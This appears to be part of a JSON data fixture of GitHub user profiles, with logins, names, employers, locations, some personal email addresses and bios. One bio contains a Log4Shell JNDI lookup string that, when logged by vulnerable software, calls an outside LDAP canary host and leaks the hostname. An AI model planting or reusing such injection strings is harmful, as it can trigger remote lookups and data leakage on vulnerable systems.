"name": "", + "login": "cldfzn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1036914?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2011-09-08T20:25:10Z", + "updated_at": "2024-08-26T14:56:24Z", + "node_id": "MDQ6VXNlcjEwMzY5MTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1762, + "fields": { + "nest_created_at": "2024-09-12T00:26:07.401Z", + "nest_updated_at": "2024-09-22T19:29:22.035Z", + "name": "Iris", + "login": "irisdingbj", + "email": "shaojun.ding@intel.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8347164?v=4", + "company": "@Intel", + "location": "Seattle, USA", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 39, + "created_at": "2014-08-04T03:24:09Z", + "updated_at": "2024-07-08T16:40:09Z", + "node_id": "MDQ6VXNlcjgzNDcxNjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "irisdingbj" + } +}, +{ + "model": "github.user", + "pk": 1763, + "fields": { + "nest_created_at": "2024-09-12T00:26:08.655Z", + "nest_updated_at": "2024-09-12T01:25:20.786Z", + "name": "", + "login": "ParthibanSG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56960979?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-10-24T10:48:10Z", + "updated_at": "2023-02-17T16:44:18Z", + "node_id": "MDQ6VXNlcjU2OTYwOTc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1764, + "fields": { + "nest_created_at": "2024-09-12T00:26:09.910Z", + "nest_updated_at": "2024-09-12T00:26:09.910Z", + "name": "Kristina Devochko", + "login": "guidemetothemoon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47773700?v=4", + "company": "", + "location": "Norway", + "collaborators_count": 0, + "following_count": 42, + "followers_count": 82, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2019-02-19T08:13:25Z", + "updated_at": "2024-09-08T10:02:55Z", + "node_id": "MDQ6VXNlcjQ3NzczNzAw", + "bio": "Hey, I'm Kris and I like to code, put cat pictures in presentations and do cloud native makeover to applications 😼", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1765, + "fields": { + "nest_created_at": "2024-09-12T00:26:11.098Z", + "nest_updated_at": "2024-09-22T19:29:14.126Z", + "name": "Juho Forsén", + "login": "jupenur", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3514914?v=4", + "company": "@mattermost ", + "location": "Turku, Finland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 32, + "public_gists_count": 3, + "public_repositories_count": 27, + "created_at": "2013-02-08T21:33:17Z", + "updated_at": "2024-08-26T11:25:07Z", + "node_id": "MDQ6VXNlcjM1MTQ5MTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1766, + "fields": { + "nest_created_at": "2024-09-12T00:26:14.779Z", + "nest_updated_at": "2024-09-12T00:26:14.779Z", + "name": "", + "login": "umbertooo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11329874?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2015-03-05T09:47:51Z", + "updated_at": "2024-08-27T14:20:26Z", + "node_id": "MDQ6VXNlcjExMzI5ODc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1767, + "fields": { + "nest_created_at": "2024-09-12T00:26:16.008Z", + "nest_updated_at": "2024-09-12T00:26:16.009Z", + "name": "Kaj Hejer", + "login": "kajh", + "email": "kaj.hejer@usit.uio.no", + "avatar_url": "https://avatars.githubusercontent.com/u/2808619?v=4", + "company": "University of Oslo", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2012-11-15T22:13:21Z", + "updated_at": "2024-08-31T11:21:25Z", + "node_id": "MDQ6VXNlcjI4MDg2MTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1768, + "fields": { + "nest_created_at": "2024-09-12T00:26:18.099Z", + "nest_updated_at": "2024-09-22T19:35:33.066Z", + "name": "", + "login": "TheRealArlie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33481096?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-11-08T09:18:29Z", + "updated_at": "2023-08-31T07:04:39Z", + "node_id": "MDQ6VXNlcjMzNDgxMDk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1769, + "fields": { + "nest_created_at": "2024-09-12T00:26:19.313Z", + "nest_updated_at": "2024-09-12T00:26:19.313Z", + "name": "Edgar Molina", + "login": "edgarmolina2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3603252?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2013-02-15T14:43:28Z", + "updated_at": "2023-05-31T03:15:21Z", + "node_id": "MDQ6VXNlcjM2MDMyNTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1770, + "fields": { + "nest_created_at": "2024-09-12T00:26:21.789Z", + "nest_updated_at": "2024-09-12T00:26:21.789Z", + "name": "", + "login": "mgmgithubtest", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42068227?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-08-03T13:26:49Z", + "updated_at": "2024-01-11T18:01:10Z", + "node_id": "MDQ6VXNlcjQyMDY4MjI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1771, + "fields": { + "nest_created_at": "2024-09-12T00:26:22.618Z", + "nest_updated_at": "2024-09-12T00:26:22.618Z", + "name": "", + "login": "dnegi-art", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74643064?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-11-18T06:03:10Z", + "updated_at": "2024-08-11T12:07:20Z", + "node_id": "MDQ6VXNlcjc0NjQzMDY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1772, + "fields": { + "nest_created_at": "2024-09-12T00:26:23.815Z", + "nest_updated_at": "2024-09-12T00:26:23.815Z", + "name": "", + "login": "pmccabe-ch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68948075?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-07-29T09:32:38Z", + "updated_at": "2023-05-04T12:30:14Z", + "node_id": "MDQ6VXNlcjY4OTQ4MDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1773, + "fields": { + "nest_created_at": "2024-09-12T00:26:25.033Z", + "nest_updated_at": "2024-09-12T00:26:25.033Z", + "name": "Santhosh Murthy", + "login": "santhoshmurthybk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50907223?v=4", + "company": "", + "location": "Bangalore, IN", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2019-05-22T08:57:14Z", + "updated_at": "2023-06-09T11:35:33Z", + "node_id": "MDQ6VXNlcjUwOTA3MjIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1774, + "fields": { + "nest_created_at": "2024-09-12T00:26:25.847Z", + "nest_updated_at": "2024-09-22T20:23:39.146Z", + "name": "Jonathan Leitschuh", + "login": "JLLeitschuh", + "email": "jonathan.leitschuh@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", + "company": "@chainguard-dev ", + "location": "Boston, MA", + "collaborators_count": 0, + "following_count": 72, + "followers_count": 751, + "public_gists_count": 33, + "public_repositories_count": 1534, + "created_at": "2012-01-12T04:25:37Z", + "updated_at": "2024-07-26T20:30:12Z", + "node_id": "MDQ6VXNlcjEzMjM3MDg=", + "bio": "Software Engineer & Security Researcher;\r\n\r\nFirst Dan Kaminsky Fellow @ HUMAN Security;\r\n\r\n${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytoken", + "is_hireable": false, + "twitter_username": "JLLeitschuh" + } +}, +{ + "model": "github.user", + "pk": 1775, + "fields": { + "nest_created_at": "2024-09-12T00:26:27.047Z", + "nest_updated_at": "2024-09-22T19:38:32.797Z", + "name": "Damien Carol", + "login": "damiencarol", + "email": "damien.carol@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1694940?v=4", + "company": "", + "location": "Paris, France", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 28, + "public_gists_count": 2, + "public_repositories_count": 66, + "created_at": "2012-05-01T08:51:22Z", + "updated_at": "2024-08-31T09:18:37Z", + "node_id": "MDQ6VXNlcjE2OTQ5NDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1776, + "fields": { + "nest_created_at": "2024-09-12T00:26:28.294Z", + "nest_updated_at": "2024-09-12T00:26:28.294Z", + "name": "Jean-Paul Thorne", + "login": "JPThorne", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1411816?v=4", + "company": "Kingmakers", + "location": "Cape Town, South Africa", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-02-06T08:12:08Z", + "updated_at": "2024-09-05T09:40:14Z", + "node_id": "MDQ6VXNlcjE0MTE4MTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "Jean_PaulThorne" + } +}, +{ + "model": "github.user", + "pk": 1777, + "fields": { + "nest_created_at": "2024-09-12T00:26:31.155Z", + "nest_updated_at": "2024-09-12T00:26:31.155Z", + "name": "Arthur Degen-Knifton", + "login": "artdk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14308935?v=4", + "company": "@PicnicSupermarket ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-09-16T08:10:58Z", + "updated_at": "2024-08-20T09:21:13Z", + "node_id": "MDQ6VXNlcjE0MzA4OTM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1778, + "fields": { + "nest_created_at": "2024-09-12T00:26:32.395Z", + "nest_updated_at": "2024-09-12T00:26:32.395Z", + "name": "", + "login": "tyaps", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5087661?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2013-07-25T08:26:06Z", + "updated_at": "2024-08-29T11:00:02Z", + "node_id": "MDQ6VXNlcjUwODc2NjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1779, + "fields": { + "nest_created_at": "2024-09-12T00:26:33.678Z", + "nest_updated_at": "2024-09-12T00:26:33.678Z", + "name": "Umang Desai", + "login": "udplume", + "email": "udesai@plume.com", + "avatar_url": "https://avatars.githubusercontent.com/u/49769547?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-04-19T00:10:56Z", + "updated_at": "2024-08-12T11:54:23Z", + "node_id": "MDQ6VXNlcjQ5NzY5NTQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1780, + "fields": { + "nest_created_at": "2024-09-12T00:26:34.861Z", + "nest_updated_at": "2024-09-12T00:26:34.861Z", + "name": "", + "login": "ngoclamnn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29177632?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2017-06-04T14:39:39Z", + "updated_at": "2024-08-29T16:10:06Z", + "node_id": "MDQ6VXNlcjI5MTc3NjMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1781, + "fields": { + "nest_created_at": "2024-09-12T00:26:36.051Z", + "nest_updated_at": "2024-09-12T00:26:36.051Z", + "name": "", + "login": "schnesim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9362735?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-10-23T06:49:32Z", + "updated_at": "2024-04-23T11:34:44Z", + "node_id": "MDQ6VXNlcjkzNjI3MzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1782, + "fields": { + "nest_created_at": "2024-09-12T00:26:37.400Z", + "nest_updated_at": "2024-09-22T19:40:17.285Z", + "name": "Chris Adams", + "login": "acdha", + "email": "chris@improbable.org", + "avatar_url": "https://avatars.githubusercontent.com/u/46565?v=4", + "company": "@LibraryOfCongress as cadams@loc.gov; personal projects as chris@improbable.org", + "location": "Washington, DC", + "collaborators_count": 0, + "following_count": 204, + "followers_count": 362, + "public_gists_count": 224, + "public_repositories_count": 201, + "created_at": "2009-01-14T17:02:15Z", + "updated_at": "2024-07-09T12:51:03Z", + "node_id": "MDQ6VXNlcjQ2NTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1783, + "fields": { + "nest_created_at": "2024-09-12T00:26:38.648Z", + "nest_updated_at": "2024-09-12T00:26:38.648Z", + "name": "", + "login": "EmporioHanzo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6170664?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-12-12T14:56:36Z", + "updated_at": "2024-06-26T07:06:41Z", + "node_id": "MDQ6VXNlcjYxNzA2NjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1784, + "fields": { + "nest_created_at": "2024-09-12T00:26:39.430Z", + "nest_updated_at": "2024-09-12T00:26:39.430Z", + "name": "", + "login": "sll552", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6547809?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2014-01-30T19:59:32Z", + "updated_at": "2024-08-17T11:23:02Z", + "node_id": "MDQ6VXNlcjY1NDc4MDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1785, + "fields": { + "nest_created_at": "2024-09-12T00:26:40.616Z", + "nest_updated_at": "2024-09-12T00:26:40.616Z", + "name": "Carsten Leue", + "login": "CarstenLeue", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7644517?v=4", + "company": "@IBM ", + "location": "Böblingen, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2014-05-20T12:23:13Z", + "updated_at": "2024-08-27T09:14:28Z", + "node_id": "MDQ6VXNlcjc2NDQ1MTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1786, + "fields": { + "nest_created_at": "2024-09-12T00:26:41.869Z", + "nest_updated_at": "2024-09-22T19:28:33.254Z", + "name": "Shevek", + "login": "shevek", + "email": "github@anarres.org", + "avatar_url": "https://avatars.githubusercontent.com/u/391350?v=4", + "company": "@CompilerWorks", + "location": "San Francisco, CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 162, + "public_gists_count": 1, + "public_repositories_count": 61, + "created_at": "2010-09-08T00:22:22Z", + "updated_at": "2024-09-16T12:47:00Z", + "node_id": "MDQ6VXNlcjM5MTM1MA==", + "bio": "Purveyor of high quality Java code to the discerning open source consumer.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1787, + "fields": { + "nest_created_at": "2024-09-12T00:26:43.089Z", + "nest_updated_at": "2024-09-12T00:26:43.089Z", + "name": "Max Dreisbusch", + "login": "sagedemdreisbusch", + "email": "max.dreisbusch@sage.com", + "avatar_url": "https://avatars.githubusercontent.com/u/50825327?v=4", + "company": "@sage", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-05-20T08:52:53Z", + "updated_at": "2024-08-29T06:28:38Z", + "node_id": "MDQ6VXNlcjUwODI1MzI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1788, + "fields": { + "nest_created_at": "2024-09-12T00:26:45.540Z", + "nest_updated_at": "2024-09-12T01:24:21.827Z", + "name": "Georg Lippold", + "login": "gl-mc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50156958?v=4", + "company": "Mastercard", + "location": "Brisbane, Australia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-04-30T22:58:38Z", + "updated_at": "2024-09-05T21:38:36Z", + "node_id": "MDQ6VXNlcjUwMTU2OTU4", + "bio": "Principal, Cryptographic Architecture & Engineering @ Mastercard", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1789, + "fields": { + "nest_created_at": "2024-09-12T00:26:46.710Z", + "nest_updated_at": "2024-09-12T00:26:46.710Z", + "name": "clf", + "login": "clfsoft", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1608414?v=4", + "company": "", + "location": "tokyo japan", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 111, + "created_at": "2012-04-03T14:18:07Z", + "updated_at": "2024-07-06T09:58:42Z", + "node_id": "MDQ6VXNlcjE2MDg0MTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1790, + "fields": { + "nest_created_at": "2024-09-12T00:26:47.943Z", + "nest_updated_at": "2024-09-12T02:36:27.733Z", + "name": "", + "login": "in-fke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73228413?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-10-21T10:41:42Z", + "updated_at": "2023-01-09T07:47:30Z", + "node_id": "MDQ6VXNlcjczMjI4NDEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1791, + "fields": { + "nest_created_at": "2024-09-12T00:26:49.145Z", + "nest_updated_at": "2024-09-12T00:26:49.145Z", + "name": "", + "login": "christophweser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65313217?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-05-13T20:52:28Z", + "updated_at": "2024-01-17T20:02:11Z", + "node_id": "MDQ6VXNlcjY1MzEzMjE3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1792, + "fields": { + "nest_created_at": "2024-09-12T00:26:51.227Z", + "nest_updated_at": "2024-09-12T00:26:51.227Z", + "name": "Arnaud Grandville", + "login": "agrandville", + "email": "agrandville@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7641990?v=4", + "company": "", + "location": "France", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 2, + "public_gists_count": 14, + "public_repositories_count": 15, + "created_at": "2014-05-20T07:17:01Z", + "updated_at": "2024-09-10T14:53:19Z", + "node_id": "MDQ6VXNlcjc2NDE5OTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1793, + "fields": { + "nest_created_at": "2024-09-12T00:26:55.606Z", + "nest_updated_at": "2024-09-12T00:26:55.606Z", + "name": "", + "login": "jerome-rauline", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58846383?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-12-13T09:51:20Z", + "updated_at": "2019-12-13T10:07:47Z", + "node_id": "MDQ6VXNlcjU4ODQ2Mzgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1794, + "fields": { + "nest_created_at": "2024-09-12T00:26:56.832Z", + "nest_updated_at": "2024-09-12T00:26:56.832Z", + "name": "Andreas Buschka", + "login": "sleepy-manul", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6627519?v=4", + "company": "Qvest Digital AG", + "location": "Bonn, Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-02-08T22:18:13Z", + "updated_at": "2024-08-27T15:49:47Z", + "node_id": "MDQ6VXNlcjY2Mjc1MTk=", + "bio": "Passionate DevOps engineer with a weakness for PostgreSQL and occasionally embedded Linux/ARM64. Former Oracle DBA for ten years. Working for @qvest-digital ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1795, + "fields": { + "nest_created_at": "2024-09-12T00:26:59.314Z", + "nest_updated_at": "2024-09-12T00:26:59.314Z", + "name": "Aaron Goldenthal", + "login": "aarongoldenthal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6117004?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2013-12-05T19:21:00Z", + "updated_at": "2024-09-06T18:55:51Z", + "node_id": "MDQ6VXNlcjYxMTcwMDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1796, + "fields": { + "nest_created_at": "2024-09-12T00:27:00.563Z", + "nest_updated_at": "2024-09-12T00:27:00.563Z", + "name": "", + "login": "Arivazhagan-s", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89505044?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-08-25T05:22:45Z", + "updated_at": "2021-08-25T05:22:45Z", + "node_id": "MDQ6VXNlcjg5NTA1MDQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1797, + "fields": { + "nest_created_at": "2024-09-12T00:27:01.763Z", + "nest_updated_at": "2024-09-12T00:27:01.763Z", + "name": "", + "login": "anilmukkamala", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89027166?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-08-16T14:20:38Z", + "updated_at": "2023-05-23T14:02:15Z", + "node_id": "MDQ6VXNlcjg5MDI3MTY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1798, + "fields": { + "nest_created_at": "2024-09-12T00:27:02.579Z", + "nest_updated_at": "2024-09-12T00:27:02.579Z", + "name": "pvegh", + "login": "pvegh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3873889?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2013-03-15T10:48:32Z", + "updated_at": "2024-08-25T11:33:41Z", + "node_id": "MDQ6VXNlcjM4NzM4ODk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1799, + "fields": { + "nest_created_at": "2024-09-12T00:27:10.321Z", + "nest_updated_at": "2024-09-12T00:27:10.321Z", + "name": "Robert Avram", + "login": "rd-robert-avram", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67262057?v=4", + "company": "REWE Digital GmbH", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 8, + "public_repositories_count": 3, + "created_at": "2020-06-22T08:22:50Z", + "updated_at": "2023-01-20T14:17:49Z", + "node_id": "MDQ6VXNlcjY3MjYyMDU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1800, + "fields": { + "nest_created_at": "2024-09-12T00:27:11.563Z", + "nest_updated_at": "2024-09-12T00:27:11.563Z", + "name": "rowe42", + "login": "rowe42", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25983841?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2017-02-23T14:53:03Z", + "updated_at": "2024-08-02T13:02:25Z", + "node_id": "MDQ6VXNlcjI1OTgzODQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1801, + "fields": { + "nest_created_at": "2024-09-12T00:27:12.362Z", + "nest_updated_at": "2024-09-12T00:27:12.362Z", + "name": "", + "login": "gosusnkr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10269103?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2014-12-22T11:15:13Z", + "updated_at": "2024-09-06T18:03:24Z", + "node_id": "MDQ6VXNlcjEwMjY5MTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1802, + "fields": { + "nest_created_at": "2024-09-12T00:27:13.194Z", + "nest_updated_at": "2024-09-12T00:27:13.194Z", + "name": "Arjen Verstoep", + "login": "Terr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108282?v=4", + "company": "", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 20, + "public_gists_count": 1, + "public_repositories_count": 42, + "created_at": "2009-07-24T10:22:13Z", + "updated_at": "2024-08-21T19:09:15Z", + "node_id": "MDQ6VXNlcjEwODI4Mg==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1803, + "fields": { + "nest_created_at": "2024-09-12T00:27:14.395Z", + "nest_updated_at": "2024-09-12T00:27:14.395Z", + "name": "Matt S", + "login": "mvs5465", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12912578?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2015-06-16T13:43:43Z", + "updated_at": "2024-09-04T11:27:24Z", + "node_id": "MDQ6VXNlcjEyOTEyNTc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1804, + "fields": { + "nest_created_at": "2024-09-12T00:27:18.089Z", + "nest_updated_at": "2024-09-12T00:27:18.089Z", + "name": "", + "login": "gpanula", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4266790?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 4, + "public_repositories_count": 59, + "created_at": "2013-04-26T16:43:12Z", + "updated_at": "2024-02-20T02:30:01Z", + "node_id": "MDQ6VXNlcjQyNjY3OTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1805, + "fields": { + "nest_created_at": "2024-09-12T00:27:19.315Z", + "nest_updated_at": "2024-09-12T00:27:19.315Z", + "name": "kerenz", + "login": "keren-orca", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73239867?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-10-21T14:25:20Z", + "updated_at": "2024-07-24T09:14:00Z", + "node_id": "MDQ6VXNlcjczMjM5ODY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1806, + "fields": { + "nest_created_at": "2024-09-12T00:27:20.580Z", + "nest_updated_at": "2024-09-12T00:27:20.580Z", + "name": "Kai Bösefeldt", + "login": "kaiboesefeldt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63350184?v=4", + "company": "", + "location": "", + "collaborators_count": 